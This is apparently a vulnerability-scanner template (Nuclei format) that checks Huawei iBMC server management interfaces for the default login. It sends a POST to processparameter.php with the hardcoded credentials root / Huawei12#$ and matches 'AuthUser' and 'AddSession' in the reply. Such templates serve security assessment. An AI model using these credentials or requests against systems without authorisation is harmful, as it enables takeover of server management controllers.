id: HUAWEI-iBMC-default-login

info:
  name: 华为服务器智能管理系统默认口令
  author: Str1am
  severity: high
  tags: iBMC,login

requests:
  - raw:
      - |
        POST /bmc/php/processparameter.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        check_pwd=Huawei12%23%24&logtype=0&user_name=root&func=AddSession

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "AuthUser"
          - "AddSession"
        part: body
        condition: and